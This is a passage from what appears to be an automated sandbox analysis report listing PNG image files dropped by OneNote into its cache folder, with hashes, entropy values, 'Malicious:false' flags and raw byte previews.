                                                                                                                                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003I.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1570
                                                                                                                                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003J.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11449
                                                                                                                                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003K.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4081
                                                                                                                                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003Q.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3679
                                                                                                                                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003R.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1657
                                                                                                                                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003S.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14458
                                                                                                                                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003T.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13030
                                                                                                                                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003U.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3879
                                                                                                                                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003V.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13084
                                                                                                                                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000040.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7374
                                                                                                                                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000041.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2210
                                                                                                                                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000042.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4847
                                                                                                                                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
